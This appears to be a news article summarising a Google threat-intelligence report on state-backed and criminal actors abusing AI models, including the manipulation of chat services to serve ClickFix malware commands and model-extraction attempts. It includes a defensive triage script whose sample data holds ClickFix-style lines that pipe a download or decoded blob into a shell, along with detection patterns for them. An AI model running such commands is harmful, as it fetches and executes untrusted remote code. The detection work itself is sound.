State-Sponsored Cyber Warfare: The AI Advantage
State-Sponsored Hackers Exploiting AI for Cyberattacks
Government-backed hackers from countries like Iran, North Korea, China, and Russia are leveraging artificial intelligence to enhance cyberattacks. According to a recent report from Google’s Threat Intelligence Group (GTIG), threat actors are using models such as Google’s Gemini to create sophisticated phishing campaigns and develop malware.
The quarterly AI Threat Tracker report, released by Google today, highlights how state-sponsored attackers have incorporated AI into every stage of their attacks, resulting in increased efficiency in reconnaissance, social engineering, and malware development during the last quarter of 2025.
GTIG researchers stated in the report that “large language models have become indispensable tools for technical research, targeting, and the swift generation of sophisticated phishing tactics” for government-backed threat actors.
State-Sponsored Hackers’ AI-Powered Reconnaissance Efforts
APT42, an Iranian threat actor, used Gemini to support reconnaissance and targeted social engineering. By feeding a target’s biography into Gemini, the group generated personas and pretexts designed to engage that specific target. It also used the model for translation and comprehension of foreign-language material, producing fluent lures without the language errors that have traditionally helped targets and filters spot phishing.
North Korean actor UNC2970, which focuses on defense-sector targeting, used Gemini to gather intelligence on high-value individuals in the cybersecurity and defense sectors and to build tailored phishing personas from that research.
Surge in Model Extraction Attacks
Google DeepMind and GTIG identified an increase in model extraction attempts, also known as “distillation attacks,” which aim to replicate a proprietary model’s capabilities (its intellectual property) by harvesting its outputs at scale. These attempts targeted Gemini’s reasoning capabilities by prompting the model to output its full reasoning process, which can then serve as training data for a copy.
GTIG did not observe state-backed advanced persistent threat (APT) actors attempting this against advanced AI models, but it noted frequent extraction attempts by private sector entities and researchers seeking to replicate proprietary logic.
Emergence of AI-Integrated Malware
GTIG uncovered malware samples, tracked as HONESTCUE, that call Gemini’s API to generate the functionality they need rather than carrying it in the sample itself. Combined with multi-layered obfuscation, this is intended to evade traditional, signature-based detection.
Additionally, GTIG identified COINBAIT, a phishing kit likely accelerated by AI code generation tools, posing as a major cryptocurrency exchange for credential harvesting.
ClickFix Campaigns Exploiting AI Chat Platforms
In a social engineering campaign observed in December 2025, threat actors abused generative AI services to distribute the ATOMIC macOS stealer. The attackers manipulated AI models into producing content that carried a malicious command line, so the ClickFix-style instruction (paste this command into Terminal) was served from a trusted AI-service domain rather than from attacker infrastructure.
Underground Marketplace Utilizing Stolen API Keys
GTIG found persistent demand for AI-enabled tooling on underground forums, with cybercriminals using stolen API keys to reach commercial AI products. One toolkit, Xanthorox, was advertised as a custom-built AI but was actually a front end to commercial models such as Gemini, accessed with stolen credentials.
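As a practitioner’s check tied to three of the findings above (HONESTCUE calling Gemini’s API from inside malware, ClickFix lures served from trusted AI domains, and stolen API keys powering underground toolkits), here is an added example of simple triage rules run over constructed endpoint telemetry. It is not code from Google, GTIG or the report. The event records, host names, the example-ai-service.test domain and the AIza… key are all constructed; the list of LLM API hosts and the allowlist of processes expected to call them are assumptions an organization would tune to its own environment.

```python
"""Triage of AI-abuse indicators over constructed endpoint telemetry.

Added example for this article, not code from Google or the GTIG report.
Every event, host, process name, domain and key below is constructed.
"""
import re
from typing import Iterable

# Hosts of commercial LLM APIs that malware (HONESTCUE-style) or a stolen-key
# toolkit would call. generativelanguage.googleapis.com is the Gemini API
# endpoint; the others are assumptions about what an organization monitors.
LLM_API_HOSTS = {
    "generativelanguage.googleapis.com",
    "api.openai.com",
    "api.anthropic.com",
}

# Assumption: browsers and one sanctioned client are expected to reach those
# hosts. Anything else doing so deserves a look.
EXPECTED_LLM_CLIENTS = {"chrome.exe", "firefox.exe", "Safari", "python3"}

# ClickFix lures ask the victim to paste a one-liner into Terminal or Run.
# The two usual shapes are "download | shell" and "decode blob | shell".
CLICKFIX_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    re.compile(r"\bbase64\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
]

# Google API keys are 39 characters starting with "AIza". A key sitting in a
# config file or log line is a key that can be stolen and resold.
GOOGLE_API_KEY = re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b")

# Constructed sample telemetry: process executions, network connections and
# file contents, one record per event.
SAMPLE_EVENTS = [
    {"type": "process", "host": "mac-01", "parent": "Terminal",
     "cmd": "echo aGVsbG8= | base64 -d | sh"},
    {"type": "process", "host": "mac-02", "parent": "Terminal",
     "cmd": "curl -fsSL https://example-ai-service.test/share/abc | bash"},
    {"type": "process", "host": "mac-03", "parent": "Terminal",
     "cmd": "ls -la ~/Downloads"},
    {"type": "network", "host": "win-07", "proc": "svchost.exe",
     "dst": "generativelanguage.googleapis.com"},
    {"type": "network", "host": "win-08", "proc": "chrome.exe",
     "dst": "generativelanguage.googleapis.com"},
    {"type": "file", "host": "build-01", "path": "config.yml",
     "content": "gemini_key: AIzaSyA1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q"},
]


def is_clickfix_command(cmd: str) -> bool:
    """True if the command line pipes a download or decoded blob into a shell."""
    return any(p.search(cmd) for p in CLICKFIX_PATTERNS)


def is_unexpected_llm_caller(proc: str, dst: str) -> bool:
    """True if a process outside the allowlist connects to an LLM API host."""
    return dst in LLM_API_HOSTS and proc not in EXPECTED_LLM_CLIENTS


def find_api_keys(text: str) -> list:
    """Return every Google-style API key found in the text."""
    return GOOGLE_API_KEY.findall(text)


def redact(key: str) -> str:
    """Keep enough of the key to correlate with, never the whole secret."""
    return key[:8] + "..." + key[-4:]


def triage(events: Iterable[dict]) -> list:
    """Return (host, rule, detail) findings for the events that match a rule."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and is_clickfix_command(ev["cmd"]):
            findings.append((ev["host"], "clickfix_paste", ev["cmd"]))
        elif ev["type"] == "network" and is_unexpected_llm_caller(ev["proc"], ev["dst"]):
            findings.append((ev["host"], "unexpected_llm_api_client",
                             f'{ev["proc"]} -> {ev["dst"]}'))
        elif ev["type"] == "file":
            for key in find_api_keys(ev["content"]):
                findings.append((ev["host"], "exposed_google_api_key",
                                 f'{ev["path"]}: {redact(key)}'))
    return findings


if __name__ == "__main__":
    for host, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{host:9} {rule:27} {detail}")
```

Running the script lists four findings from the six sample events: two ClickFix-style paste commands, one non-browser process talking to the Gemini API, and one API key in a config file. The rules are deliberately coarse; developers do legitimately run `curl … | sh` installers, so in production the ClickFix rule should be corroborated with the parent process (a terminal spawned right after a browser visit to a chat page) and the LLM-client allowlist kept current, or the alert volume will bury the real hits.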
Google’s Response and Mitigations
Google has taken action against malicious actors by disabling accounts associated with malicious activity. The company continues to enhance its models to prevent misuse and disrupt attacks effectively.
GTIG stressed that, despite advances in AI capability, no actor has yet used it to fundamentally alter the threat landscape. The report’s takeaway is that AI is playing a growing role in attacks and that defenders need strategies tuned to AI-augmented tradecraft.
(Image by SCARECROW artworks)